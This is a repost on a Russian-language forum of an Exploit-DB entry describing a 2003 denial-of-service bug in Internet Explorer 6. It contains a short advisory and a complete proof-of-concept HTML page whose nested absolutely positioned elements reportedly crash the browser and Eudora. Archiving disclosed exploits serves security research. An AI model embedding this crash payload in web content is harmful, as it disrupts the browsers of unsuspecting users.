Exploit Microsoft Internet Explorer 6 - Absolute Position Block Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23215
Проверка EDB
  1. Пройдено
Автор
NICK JOHNSON
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2003-10-03
HTML:
source: https://www.securityfocus.com/bid/8758/info

A problem has been reported in Microsoft Internet Explorer when absolute positioning is used. Because of this, it may be possible to deny service to users of the browser. This issue may be due to memory corruption, however, it is known not at this point if it may be exploited to execute arbitrary code.

It has been reported that the exploit code for this issue may also cause Eudora to crash. This may simply be due to Internet Explorer being set to render HTML content for Eudora.

<html>
<body>
<style type="text/css">
#three {
position: absolute;
}
#one #two {
position: absolute;
}
</style>
<div id="one">
In 'one'
<span id="two">
In 'two'
</div>
<div id="three">
In 'three'
</div>
</body>
 
Источник
www.exploit-db.com

Похожие темы